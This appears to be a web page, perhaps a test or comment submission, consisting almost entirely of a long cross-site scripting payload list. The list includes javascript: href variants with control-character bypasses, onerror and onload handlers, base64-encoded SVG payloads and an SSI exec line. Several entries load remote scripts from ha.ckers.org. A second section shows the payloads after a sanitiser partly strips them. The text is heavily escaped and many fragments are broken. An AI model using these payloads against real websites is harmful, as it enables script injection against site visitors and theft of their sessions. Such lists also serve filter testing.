href=\\\"\\\\xE2\\\\x80\\\\x87javascript:javascript:alert(1)\\\" id=\\\"fuzzelement1\\\">test</a>\\r\\n<a href=\\\"\\\\x07javascript:javascript:alert(1)\\\" id=\\\"fuzzelement1\\\">test</a>\\r\\n<a href=\\\"\\\\xE1\\\\x9A\\\\x80javascript:javascript:alert(1)\\\" id=\\\"fuzzelement1\\\">test</a>\\r\\n<a href=\\\"\\\\xE2\\\\x80\\\\x83javascript:javascript:alert(1)\\\" id=\\\"fuzzelement1\\\">test</a>\\r\\n<a href=\\\"\\\\x04javascript:javascript:alert(1)\\\" id=\\\"fuzzelement1\\\">test</a>\\r\\n<a href=\\\"\\\\x01javascript:javascript:alert(1)\\\" id=\\\"fuzzelement1\\\">test</a>\\r\\n<a href=\\\"\\\\x08javascript:javascript:alert(1)\\\" id=\\\"fuzzelement1\\\">test</a>\\r\\n<a href=\\\"\\\\xE2\\\\x80\\\\x84javascript:javascript:alert(1)\\\" id=\\\"fuzzelement1\\\">test</a>\\r\\n<a href=\\\"\\\\xE2\\\\x80\\\\x86javascript:javascript:alert(1)\\\" id=\\\"fuzzelement1\\\">test</a>\\r\\n<a href=\\\"\\\\xE3\\\\x80\\\\x80javascript:javascript:alert(1)\\\" id=\\\"fuzzelement1\\\">test</a>\\r\\n<a href=\\\"\\\\x12javascript:javascript:alert(1)\\\" id=\\\"fuzzelement1\\\">test</a>\\r\\n<a href=\\\"\\\\x0Djavascript:javascript:alert(1)\\\" id=\\\"fuzzelement1\\\">test</a>\\r\\n<a href=\\\"\\\\x0Ajavascript:javascript:alert(1)\\\" id=\\\"fuzzelement1\\\">test</a>\\r\\n<a href=\\\"\\\\x0Cjavascript:javascript:alert(1)\\\" id=\\\"fuzzelement1\\\">test</a>\\r\\n<a href=\\\"\\\\x15javascript:javascript:alert(1)\\\" id=\\\"fuzzelement1\\\">test</a>\\r\\n<a href=\\\"\\\\xE2\\\\x80\\\\xA8javascript:javascript:alert(1)\\\" id=\\\"fuzzelement1\\\">test</a>\\r\\n<a href=\\\"\\\\x16javascript:javascript:alert(1)\\\" id=\\\"fuzzelement1\\\">test</a>\\r\\n<a href=\\\"\\\\x02javascript:javascript:alert(1)\\\" id=\\\"fuzzelement1\\\">test</a>\\r\\n<a href=\\\"\\\\x1Bjavascript:javascript:alert(1)\\\" id=\\\"fuzzelement1\\\">test</a>\\r\\n<a href=\\\"\\\\x06javascript:javascript:alert(1)\\\" id=\\\"fuzzelement1\\\">test</a>\\r\\n<a href=\\\"\\\\xE2\\\\x80\\\\xA9javascript:javascript:alert(1)\\\" id=\\\"fuzzelement1\\\">test</a>\\r\\n<a href=\\\"\\\\xE2\\\\x80\\\\x85javascript:javascript:alert(1)\\\" id=\\\"fuzzelement1\\\">test</a>\\r\\n<a href=\\\"\\\\x1Ejavascript:javascript:alert(1)\\\" id=\\\"fuzzelement1\\\">test</a>\\r\\n<a href=\\\"\\\\xE2\\\\x81\\\\x9Fjavascript:javascript:alert(1)\\\" id=\\\"fuzzelement1\\\">test</a>\\r\\n<a href=\\\"\\\\x1Cjavascript:javascript:alert(1)\\\" id=\\\"fuzzelement1\\\">test</a>\\r\\n<a href=\\\"javascript\\\\x00:javascript:alert(1)\\\" id=\\\"fuzzelement1\\\">test</a>\\r\\n<a href=\\\"javascript\\\\x3A:javascript:alert(1)\\\" id=\\\"fuzzelement1\\\">test</a>\\r\\n<a href=\\\"javascript\\\\x09:javascript:alert(1)\\\" id=\\\"fuzzelement1\\\">test</a>\\r\\n<a href=\\\"javascript\\\\x0D:javascript:alert(1)\\\" id=\\\"fuzzelement1\\\">test</a>\\r\\n<a href=\\\"javascript\\\\x0A:javascript:alert(1)\\\" id=\\\"fuzzelement1\\\">test</a>\\r\\n`\\\"\\\'><img src=xxx:x \\\\x0Aonerror=javascript:alert(1)>\\r\\n`\\\"\\\'><img src=xxx:x \\\\x22onerror=javascript:alert(1)>\\r\\n`\\\"\\\'><img src=xxx:x \\\\x0Bonerror=javascript:alert(1)>\\r\\n`\\\"\\\'><img src=xxx:x \\\\x0Donerror=javascript:alert(1)>\\r\\n`\\\"\\\'><img src=xxx:x \\\\x2Fonerror=javascript:alert(1)>\\r\\n`\\\"\\\'><img src=xxx:x \\\\x09onerror=javascript:alert(1)>\\r\\n`\\\"\\\'><img src=xxx:x \\\\x0Conerror=javascript:alert(1)>\\r\\n`\\\"\\\'><img src=xxx:x \\\\x00onerror=javascript:alert(1)>\\r\\n`\\\"\\\'><img src=xxx:x \\\\x27onerror=javascript:alert(1)>\\r\\n`\\\"\\\'><img src=xxx:x \\\\x20onerror=javascript:alert(1)>\\r\\n\\\"`\\\'><script>\\\\x3Bjavascript:alert(1)</script>\\r\\n\\\"`\\\'><script>\\\\x0Djavascript:alert(1)</script>\\r\\n\\\"`\\\'><script>\\\\xEF\\\\xBB\\\\xBFjavascript:alert(1)</script>\\r\\n\\\"`\\\'><script>\\\\xE2\\\\x80\\\\x81javascript:alert(1)</script>\\r\\n\\\"`\\\'><script>\\\\xE2\\\\x80\\\\x84javascript:alert(1)</script>\\r\\n\\\"`\\\'><script>\\\\xE3\\\\x80\\\\x80javascript:alert(1)</script>\\r\\n\\\"`\\\'><script>\\\\x09javascript:alert(1)</script>\\r\\n\\\"`\\\'><script>\\\\xE2\\\\x80\\\\x89javascript:alert(1)</script>\\r\\n\\\"`\\\'><script>\\\\xE2\\\\x80\\\\x85javascript:alert(1)</script>\\r\\n\\\"`\\\'><script>\\\\xE2\\\\x80\\\\x88javascript:alert(1)</script>\\r\\n\\\"`\\\'><script>\\\\x00javascript:alert(1)</script>\\r\\n\\\"`\\\'><script>\\\\xE2\\\\x80\\\\xA8javascript:alert(1)</script>\\r\\n\\\"`\\\'><script>\\\\xE2\\\\x80\\\\x8Ajavascript:alert(1)</script>\\r\\n\\\"`\\\'><script>\\\\xE1\\\\x9A\\\\x80javascript:alert(1)</script>\\r\\n\\\"`\\\'><script>\\\\x0Cjavascript:alert(1)</script>\\r\\n\\\"`\\\'><script>\\\\x2Bjavascript:alert(1)</script>\\r\\n\\\"`\\\'><script>\\\\xF0\\\\x90\\\\x96\\\\x9Ajavascript:alert(1)</script>\\r\\n\\\"`\\\'><script>-javascript:alert(1)</script>\\r\\n\\\"`\\\'><script>\\\\x0Ajavascript:alert(1)</script>\\r\\n\\\"`\\\'><script>\\\\xE2\\\\x80\\\\xAFjavascript:alert(1)</script>\\r\\n\\\"`\\\'><script>\\\\x7Ejavascript:alert(1)</script>\\r\\n\\\"`\\\'><script>\\\\xE2\\\\x80\\\\x87javascript:alert(1)</script>\\r\\n\\\"`\\\'><script>\\\\xE2\\\\x81\\\\x9Fjavascript:alert(1)</script>\\r\\n\\\"`\\\'><script>\\\\xE2\\\\x80\\\\xA9javascript:alert(1)</script>\\r\\n\\\"`\\\'><script>\\\\xC2\\\\x85javascript:alert(1)</script>\\r\\n\\\"`\\\'><script>\\\\xEF\\\\xBF\\\\xAEjavascript:alert(1)</script>\\r\\n\\\"`\\\'><script>\\\\xE2\\\\x80\\\\x83javascript:alert(1)</script>\\r\\n\\\"`\\\'><script>\\\\xE2\\\\x80\\\\x8Bjavascript:alert(1)</script>\\r\\n\\\"`\\\'><script>\\\\xEF\\\\xBF\\\\xBEjavascript:alert(1)</script>\\r\\n\\\"`\\\'><script>\\\\xE2\\\\x80\\\\x80javascript:alert(1)</script>\\r\\n\\\"`\\\'><script>\\\\x21javascript:alert(1)</script>\\r\\n\\\"`\\\'><script>\\\\xE2\\\\x80\\\\x82javascript:alert(1)</script>\\r\\n\\\"`\\\'><script>\\\\xE2\\\\x80\\\\x86javascript:alert(1)</script>\\r\\n\\\"`\\\'><script>\\\\xE1\\\\xA0\\\\x8Ejavascript:alert(1)</script>\\r\\n\\\"`\\\'><script>\\\\x0Bjavascript:alert(1)</script>\\r\\n\\\"`\\\'><script>\\\\x20javascript:alert(1)</script>\\r\\n\\\"`\\\'><script>\\\\xC2\\\\xA0javascript:alert(1)</script>\\r\\n\\\"/><img/onerror=\\\\x0Bjavascript:alert(1)\\\\x0Bsrc=xxx:x />\\r\\n\\\"/><img/onerror=\\\\x22javascript:alert(1)\\\\x22src=xxx:x />\\r\\n\\\"/><img/onerror=\\\\x09javascript:alert(1)\\\\x09src=xxx:x />\\r\\n\\\"/><img/onerror=\\\\x27javascript:alert(1)\\\\x27src=xxx:x />\\r\\n\\\"/><img/onerror=\\\\x0Ajavascript:alert(1)\\\\x0Asrc=xxx:x />\\r\\n\\\"/><img/onerror=\\\\x0Cjavascript:alert(1)\\\\x0Csrc=xxx:x />\\r\\n\\\"/><img/onerror=\\\\x0Djavascript:alert(1)\\\\x0Dsrc=xxx:x />\\r\\n\\\"/><img/onerror=\\\\x60javascript:alert(1)\\\\x60src=xxx:x />\\r\\n\\\"/><img/onerror=\\\\x20javascript:alert(1)\\\\x20src=xxx:x />\\r\\n<script\\\\x2F>javascript:alert(1)</script>\\r\\n<script\\\\x20>javascript:alert(1)</script>\\r\\n<script\\\\x0D>javascript:alert(1)</script>\\r\\n<script\\\\x0A>javascript:alert(1)</script>\\r\\n<script\\\\x0C>javascript:alert(1)</script>\\r\\n<script\\\\x00>javascript:alert(1)</script>\\r\\n<script\\\\x09>javascript:alert(1)</script>\\r\\n\\\"><img src=x onerror=javascript:alert(1)>\\r\\n\\\"><img src=x onerror=javascript:alert(\\\'1\\\')>\\r\\n\\\"><img src=x onerror=javascript:alert(\\\"1\\\")>\\r\\n\\\"><img src=x onerror=javascript:alert(`1`)>\\r\\n\\\"><img src=x onerror=javascript:alert((\\\'1\\\'))>\\r\\n\\\"><img src=x onerror=javascript:alert((\\\"1\\\"))>\\r\\n\\\"><img src=x onerror=javascript:alert((`1`))>\\r\\n\\\"><img src=x onerror=javascript:alert(A)>\\r\\n\\\"><img src=x onerror=javascript:alert((A))>\\r\\n\\\"><img src=x onerror=javascript:alert((\\\'A\\\'))>\\r\\n\\\"><img src=x onerror=javascript:alert(\\\'A\\\')>\\r\\n\\\"><img src=x onerror=javascript:alert((\\\"A\\\"))>\\r\\n\\\"><img src=x onerror=javascript:alert(\\\"A\\\")>\\r\\n\\\"><img src=x onerror=javascript:alert((`A`))>\\r\\n\\\"><img src=x onerror=javascript:alert(`A`)>\\r\\n`\\\"\\\'><img src=xxx:x onerror\\\\x0B=javascript:alert(1)>\\r\\n`\\\"\\\'><img src=xxx:x onerror\\\\x00=javascript:alert(1)>\\r\\n`\\\"\\\'><img src=xxx:x onerror\\\\x0C=javascript:alert(1)>\\r\\n`\\\"\\\'><img src=xxx:x onerror\\\\x0D=javascript:alert(1)>\\r\\n`\\\"\\\'><img src=xxx:x onerror\\\\x20=javascript:alert(1)>\\r\\n`\\\"\\\'><img src=xxx:x onerror\\\\x0A=javascript:alert(1)>\\r\\n`\\\"\\\'><img src=xxx:x onerror\\\\x09=javascript:alert(1)>\\r\\n<script>javascript:alert(1)<\\\\x00/script>\\r\\n<img src=# onerror\\\\x3D\\\"javascript:alert(1)\\\" >\\r\\n<input onfocus=javascript:alert(1) autofocus>\\r\\n<input onblur=javascript:alert(1) autofocus><input autofocus>\\r\\n<video poster=javascript:javascript:alert(1)//\\r\\n<body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus>\\r\\n<form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X\\r\\n<video><source onerror=\\\"javascript:javascript:alert(1)\\\">\\r\\n<video onerror=\\\"javascript:javascript:alert(1)\\\"><source>\\r\\n<form><button formaction=\\\"javascript:javascript:alert(1)\\\">X\\r\\n<body oninput=javascript:alert(1)><input autofocus>\\r\\n<math href=\\\"javascript:javascript:alert(1)\\\">CLICKME</math> <math> <maction actiontype=\\\"statusline#http://google.com\\\" xlink:href=\\\"javascript:javascript:alert(1)\\\">CLICKME</maction> </math>\\r\\n<frameset onload=javascript:alert(1)>\\r\\n<table background=\\\"javascript:javascript:alert(1)\\\">\\r\\n<!--<img src=\\\"--><img src=x onerror=javascript:alert(1)//\\\">\\r\\n<comment><img src=\\\"</comment><img src=x onerror=javascript:alert(1))//\\\">\\r\\n<![><img src=\\\"]><img src=x onerror=javascript:alert(1)//\\\">\\r\\n<style><img src=\\\"</style><img src=x onerror=javascript:alert(1)//\\\">\\r\\n<li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div>\\r\\n<head><base href=\\\"javascript://\\\"></head><body><a href=\\\"/. /,javascript:alert(1)//#\\\">XXX</a></body>\\r\\n<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT>\\r\\n<OBJECT CLASSID=\\\"clsid:333C7BC4-460F-11D0-BC04-0080C7055A83\\\"><PARAM NAME=\\\"DataURL\\\" VALUE=\\\"javascript:alert(1)\\\"></OBJECT>\\r\\n<object data=\\\"data:text/html;base64,%(base64)s\\\">\\r\\n<embed src=\\\"data:text/html;base64,%(base64)s\\\">

keyword(s): z

description:

\\r\\n
\\r\\n
\\r\\n
\\r\\n
\\r\\n
\\r\\n<!--[if gte IE 4]>alert(\\\'XSS\\\');\\\'\\\"-->\\r\\n<? echo(\\\'alert(\\\"XSS\\\")\\\'); ?>\\r\\n\\>\\>\\>\\>\\>\\r\\n\\\'>\\\" SRC=\\\"http://ha.ckers.org/xss.js\\\">\\r\\n(\\\"\\r\\nXSS\\r\\n0\\\\\\\"autofocus/=alert(1)--><video/>\\\"-confirm(3)-\\\"\\r\\nveris-->group<svg/=alert(/XSS/)//\\r\\n#\\\">\\ >\\>[\\\" =\\\">\\>\\r\\nfor((i)in(self))eval(i)(1)\\r\\n\\r\\n\\r\\ntest\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\ >\\/>\\r\\n\\\">

<IFRAME SRC=\\\"(\\\'XSS\\\');\\\"></IFRAME>\\\">123

\\r\\n\\\">

<IFRAME SRC=# =\\\"alert()\\\"></IFRAME>123

\\r\\n<IFRAME SRC=\\\"(\\\'XSS\\\');\\\"></IFRAME>\\r\\n<IFRAME SRC=# =\\\"alert()\\\"></IFRAME>\\r\\n\\\">

<IFRAME SRC=# =\\\"alert()\\\"></IFRAME>123

\\r\\n\\\"></iframe>alert(`TEXT YOU WANT TO BE DISPLAYED`);<iframe frameborder=\\\"0\\r\\n\\\">

<IFRAME width=\\\"420\\\" height=\\\"315\\\" SRC=\\\"http://www.youtube.com/embed/sxvccpasgTE\\\" frameborder=\\\"0\\\" =\\\"alert()\\\"></IFRAME>123

\\r\\n\\\">

<iframe width=\\\"420\\\" height=\\\"315\\\" src=\\\"http://www.youtube.com/embed/sxvccpasgTE\\\" frameborder=\\\"0\\\" allowfullscreen></iframe>123

\\r\\n>

<IFRAME width=\\\"420\\\" height=\\\"315\\\" frameborder=\\\"0\\\" =\\\".href=\\\'https://www.youtube.com/channel/UC9Qa_gXarSmObPX3ooIQZr\\r\\ng\\\'\\\"></IFRAME>Hover the cursor to the LEFT of this Message

&ParamHeight=250\\r\\n<IFRAME width=\\\"420\\\" height=\\\"315\\\" frameborder=\\\"0\\\" =\\\"alert()\\\"></IFRAME>\\r\\n\\\">

<IFRAME SRC=\\\"(\\\'XSS\\\');\\\"></IFRAME>\\\">123

\\r\\n\\\">

<IFRAME SRC=# =\\\"alert()\\\"></IFRAME>123

\\r\\n<iframe src=http://xss.rocks/scriptlet.html <\\r\\n<IFRAME SRC=\\\"(\\\'XSS\\\');\\\"></IFRAME>\\r\\n<IFRAME SRC=# =\\\"alert()\\\"></IFRAME>\\r\\n<iframe src=\\\" (1) \\\">\\r\\n<svg><style>{font-family:\\\'<iframe/=confirm(1)>\\\'\\r\\n<input/=\\\"(1)\\\"\\r\\n<sVg><isindex >\\>\\>X</a\\r\\nhttp://www.googlealert)\r\\n<a >XYZ</a\\r\\n<img/>alert(String.fromCharCode(49))^__^\\r\\n</style ><input type=\\\"date\\\" =\\\"alert(1)\\\">\\r\\n<form><textarea =\\\'\\\a\\\l\\\e\\\r\\\t(1)\\\'>\\r\\n\\\'>\\r\\n<a >X</a>\\r\\n\\r\\n<style/=<!-- > alert (1)>\\r\\n<///style///><span / =\\\'alert(1)\\\'>SPAN\\r\\n<img/><svg><style>{-o-link-source:\\\'<body/=confirm(1)>\\\'\\r\\n <blink/ =prompt(1)>OnMouseOver {Firefox & Opera}\\r\\n<marquee =\\\'(1)\\\'>^__^\\r\\n<div/>X</div> {IE7}\\r\\n<iframe// src=(1)\\r\\n//<form/action=()><input/type=\\\'submit\\\'>//\\r\\n/*iframe/src*/<iframe/src=\\\"<iframe/src=@\\\"/=prompt(1) /*iframe/src*/>\\r\\n//|\\\\\\\\ //|\\\\\\\\ //|\\\\\\\\\\r\\n</font>/<svg><style>{src:\\\'<style/=this.=confirm(1)>\\\'</font>/</style>\\r\\n<a/><input type=\\\"X\\\">\\r\\n</plaintext\\\\></|\\\\><plaintext/=prompt(1)\\r\\n</svg>\\\'\\\'<svg>alert(1) {Opera}\\r\\n<a ><button>\\r\\n<div =\\\'alert(1)\\\'>DIV</div>\\r\\n<iframe =\\\"prompt(1)\\\">\\r\\n<a >X</a>\\r\\n<embed src=\\\"http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\\\">\\r\\n<object data=\\\"http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\\\">\\r\\n<var =\\\"prompt(1)\\\">On Mouse Over</var>\\r\\n<a >Click Here</a>\\r\\n<img >\\r\\n<%<!--\\\'%>alert(1);-->\\r\\n\\\">X</a\\r\\n<iframe/=\\\a\\\l\\\e\\\r\\\t(\\\'\\\a\\\') worksinIE>\\r\\n~\\\'\\\a\\\' ; \\\t\\\h\\\r\\\o\\\w ~ \\\t\\\h\\\i\\\s. \\\a\\\l\\\e\\\r\\\t(~\\\'\\\a\\\')U+\\r\\n</object>\\r\\n<iframe src=\\\%(base64)s\\\">\\r\\n<embed src=\\\%(base64)s\\\">

by zz | at 2021-08-19 09:45:17

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

\\\'\\\';!--\\\"=&{()}\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\nxxs link\\r\\nxxs link\\r\\n\\\">\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\nperl -e \\\'print \\\"\\\";\\\' > out\\r\\n\\r\\n\\r\\n<BODY !#$%&()*~+-_.,:;?@[/|\\\\]^`=alert(\\\"XSS\\\")>\\r\\n\\r\\n<\\r\\n\\r\\n\\r\\n<IMG >\\>\\>\\r\\n<IMG >\\r\\n<IMG >\\r\\n<STYLE>li {list-style-image: url(\\\"(\\\'XSS\\\')\\\");}</STYLE><UL><LI>XSS</br>\\r\\n<IMG >\\r\\n<IMG >\\r\\n<BODY >\\r\\n<BGSOUND SRC=\\\"(\\\'XSS\\\');\\\">\\r\\n<BR SIZE=\\\"&{alert(\\\'XSS\\\')}\\\">\\r\\n<LINK REL=\\\"stylesheet\\\" HREF=\\\"(\\\'XSS\\\');\\\">\\r\\n<LINK REL=\\\"stylesheet\\\" HREF=\\\"http://ha.ckers.org/xss.css\\\">\\r\\n<STYLE>@import\\\'http://ha.ckers.org/xss.css\\\';</STYLE>\\r\\n<META HTTP-EQUIV=\\\"Link\\\" Content=\\\"<http://ha.ckers.org/xss.css>; REL=stylesheet\\\">\\r\\n<STYLE>BODY{:url(\\\"http://ha.ckers.org/xssmoz.xml#xss\\\")}</STYLE>\\r\\n<STYLE>@im\\\\port\\\'\\\\ja\\\\vasc\\\\ript:alert(\\\"XSS\\\")\\\';</STYLE>\\r\\n<IMG >\\r\\nexp/*<A >\\r\\n<STYLE TYPE=\\\"text/javascript\\\">alert(\\\'XSS\\\');</STYLE>\\r\\n<STYLE>.XSS{background-image:url(\\\"(\\\'XSS\\\')\\\");}</STYLE><A ></A>\\r\\n<STYLE type=\\\"text/css\\\">BODY{background:url(\\\"(\\\'XSS\\\')\\\")}</STYLE>\\r\\n<STYLE type=\\\"text/css\\\">BODY{background:url(\\\"(\\\'XSS\\\')\\\")}</STYLE>\\r\\n<XSS >\\r\\n<XSS >\\r\\n\\r\\n<META HTTP-EQUIV=\\\"refresh\\\" CONTENT=\\\"0;url=PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\\\">\\r\\n<META HTTP-EQUIV=\\\"refresh\\\" CONTENT=\\\"0; URL=http://;URL=(\\\'XSS\\\');\\\">\\r\\n<IFRAME SRC=\\\"(\\\'XSS\\\');\\\"></IFRAME>\\r\\n<IFRAME SRC=# ></IFRAME>\\r\\n<FRAMESET><FRAME SRC=\\\"(\\\'XSS\\\');\\\"></FRAMESET>\\r\\n<TABLE BACKGROUND=\\\"(\\\'XSS\\\')\\\">\\r\\n<TABLE><TD BACKGROUND=\\\"(\\\'XSS\\\')\\\">\\r\\n<DIV url((\\\'XSS\\\'))\\\">\\r\\n<DIV >\\r\\n<DIV url((\\\'XSS\\\'))\\\">\\r\\n<DIV alert(\\\'XSS\\\'));\\\">\\r\\n<BASE HREF=\\\"(\\\'XSS\\\');//\\\">\\r\\n <OBJECT TYPE=\\\"text/x-scriptlet\\\" DATA=\\\"http://ha.ckers.org/scriptlet.html\\\"></OBJECT>\\r\\n<EMBED SRC=\\\PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\\\" type=\\\"image/svg+xml\\\" AllowScriptAccess=\\\"always\\\"></EMBED>\\r\\n\\r\\n<!--#exec cmd=\\\"/bin/echo \\\'<SCR\\\'\\\"--><!--#exec cmd=\\\"/bin/echo \\\'IPT SRC=http://ha.ckers.org/xss.js>\\\'\\\"-->\\r\\n<? echo(\\\'<SCR)\\\';echo(\\\'IPT>alert(\\\"XSS\\\")\\\'); ?>\\r\\n<IMG >\\>\\r\\n <HEAD><META HTTP-EQUIV=\\\"CONTENT-TYPE\\\" CONTENT=\\\"text/html; charset=UTF-7\\\"> </HEAD>\\r\\n\\\" SRC=\\\"http://ha.ckers.org/xss.js\\\">\\r\\n\\r\\n\\\" \\\'\\\' SRC=\\\"http://ha.ckers.org/xss.js\\\">\\r\\n\\\'\\\" SRC=\\\"http://ha.ckers.org/xss.js\\\">\\r\\n` SRC=\\\"http://ha.ckers.org/xss.js\\\">\\r\\n\\\'>\\\" SRC=\\\"http://ha.ckers.org/xss.js\\\">\\r\\nPT SRC=\\\"http://ha.ckers.org/xss.js\\\">\\r\\n<A >XSS</A>\\r\\n<A >XSS</A>\\r\\n<A >XSS</A>\\r\\n<A >XSS</A>\\r\\n<A >XSS</A>\\r\\n<A >XSS</A>\\r\\n<iframe src=\\\" (1) \\\">\\r\\n<svg><style>{font-family:\\\'<iframe/>\\\'\\r\\n<input/><isindex >\\>\\>\\\">\\/>\\r\\n<svg>\r\\n<svg>\\r\\n<iframe src=)>\\r\\n<form><a >X\\r\\n<img/*/>\\r\\n<img/ >\\r\\n<form><iframe src=\\\"(1)\\\" ;>\\r\\n<a >X</a\\r\\nhttp://www.googlealert)\r\\n<a >XYZ</a\\r\\n<img/>alert(String.fromCharCode(49))^__^\\r\\n</style ><input type=\\\"date\\\" >\\r\\n<form><textarea >\\r\\n\\r\\n<a >X</a>\\r\\n\\r\\n<style/ > alert (1)>\\r\\n<///style///><span / >SPAN\\r\\n<img/><svg><style>{-o-link-source:\\\'<body/>\\\'\\r\\n <blink/ > {Firefox & Opera}\\r\\n<marquee >^__^\\r\\n<div/>X</div> {IE7}\\r\\n<iframe// src=(1)\\r\\n//<form/action=()><input/type=\\\'submit\\\'>//\\r\\n/*iframe/src*/<iframe/src=\\\"<iframe/src=@\\\"/ /*iframe/src*/>\\r\\n//|\\\\\\\\ //|\\\\\\\\ //|\\\\\\\\\\r\\n</font>/<svg><style>{src:\\\'<style/>\\\'</font>/</style>\\r\\n<a/><input type=\\\"X\\\">\\r\\n</plaintext\\\\></|\\\\><plaintext/>\\\'\\\'<svg>alert(1) {Opera}\\r\\n<a ><button>\\r\\n<div >DIV</div>\\r\\n<iframe >\\r\\n<a >X</a>\\r\\n<embed src=\\\"http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\\\">\\r\\n<object data=\\\"http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\\\">\\r\\n<var >On Mouse Over</var>\\r\\n<a >Click Here</a>\\r\\n<img >\\r\\n<%<!--\\\'%>\\r\\n\\r\\n<iframe/src \\\\/\\\\/ value=<><iframe/src=(1)\\r\\n<input type=\\\"text\\\" value=`` <div/>X</div>\\r\\nhttp://www.</iframe>\\r\\n<svg></iframe>\\r\\n<img >\\></object>\\r\\n<meta http-equiv=\\\"refresh\\\" content=\\\"0;(1)\\\"/>\\r\\n<math><a >click\\r\\n<embed code=\\\"http://businessinfo.co.uk/labs/xss/xss.swf\\\" allowscriptaccess=always>\\r\\n<svg contentScriptType=text/vbs>\\\">X</a\\r\\n<iframe/ worksinIE>\\r\\na=\\\a & /=/\\r\\n\r\\n<object data=\\\alert(1)>\\r\\n\\r\\n<body/ alert(1)>\\r\\n/*\\r\\n<svg> alert(1)\\r\\n<a >ClickMe\\r\\n alert(1) 1=2\\r\\n<div/> style=\\\"x:\\\">\\r\\n<--`<img/> --!>\\>x</button>\\r\\n\\\"><img >\\r\\n<form><button >CLICKME\\r\\n<math><a >click\\r\\n<object data=PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>\\r\\n<iframe src=\\\PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>\\r\\n<iframe src=\\\PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\\\">\\r\\n<IFRAME SRC=\\\"(\\\'XSS\\\');\\\"></IFRAME>\\r\\n<EMBED SRC=\\\PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\\\" type=\\\"image/svg+xml\\\" AllowScriptAccess=\\\"always\\\"></EMBED>\\r\\n\\\" SRC=\\\"http://ha.ckers.org/xss.js\\\">\\r\\n\\\" \\\'\\\' SRC=\\\"http://ha.ckers.org/xss.js\\\">\\r\\n\\\'\\\" SRC=\\\"http://ha.ckers.org/xss.js\\\">\\r\\n\\\'>\\\" SRC=\\\"http://ha.ckers.org/xss.js\\\">\\r\\nPT SRC=\\\"http://ha.ckers.org/xss.js\\\">\\r\\n<\\r\\n<\\\"\\\';alert(String.fromCharCode(88,83,83))//\\\\\\\';alert(String.fromCharCode(88,83,83))//\\\";alert(String.fromCharCode(88,83,83))//\\\\\\\";alert(String.fromCharCode(88,83,83))//-->\\\">\\\'>\\r\\n\\\';alert(String.fromCharCode(88,83,83))//\\\\\\\';alert(String.fromCharCode(88,83,83))//\\\";alert(String.fromCharCode(88,83,83))//\\\\\\\";alert(String.fromCharCode(88,83,83))//-->\\\">\\\'>&submit.x=27&submit.y=9&cmd=search\\r\\n&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510\\r\\n&search=1\\r\\n0&q=\\\';alert(String.fromCharCode(88,83,83))//\\\\\\\';alert%2?8String.fromCharCode(88,83,83))//\\\";alert(String.fromCharCode?(88,83,83))//\\\\\\\";alert(String.fromCharCode(88,83,83)%?29//-->\\\">\\\'>&submit-frmGoogleWeb=Web+Search\\r\\n<h1><font color=blue>hellox worldss</h1>\\r\\n<BODY worldss\\\')>\\r\\n<input autofocus>\\r\\n<input autofocus><input autofocus>\\r\\n<body 